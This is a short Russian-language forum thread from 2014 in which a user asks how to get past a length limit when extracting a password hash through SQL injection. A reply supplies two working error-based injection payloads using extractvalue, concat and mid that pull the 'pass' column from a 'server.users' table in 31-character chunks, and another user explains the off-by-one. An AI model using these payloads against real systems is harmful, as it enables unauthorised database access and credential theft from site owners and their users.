09.01.2014, 21:42
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Massay
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--
and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--
Сообщение от K800
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
|
|
|